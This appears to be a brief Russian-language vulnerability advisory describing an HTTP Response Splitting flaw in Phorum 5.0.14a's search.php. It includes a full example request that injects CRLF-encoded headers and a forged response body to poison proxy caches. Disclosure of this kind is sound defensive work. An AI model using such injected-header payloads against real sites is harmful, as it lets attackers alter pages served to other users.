• Партнер

  • Программа: Phorum 5.0.14a

    Уязвимость позволяет удаленному
    пользователю отравить кеш прокси сервера и
    изменить содержимое web страниц уязвимого
    сайта. Уязвимость существует из-за
    недостаточной обработки параметра Location.
    Удаленный пользователь может с помощью
    специально сформированного HTTP GET запроса
    произвести HTTP Response Splitting атаку и подменить
    содержимое страниц сайта в кеше прокси
    сервера.

    Пример:

    http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:
    %200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0
    d%0aContent-Length:%2034%0d%0a%0d%0a<html>ScannedbyPTsecurity</html>%0d%0
    a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates=30

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии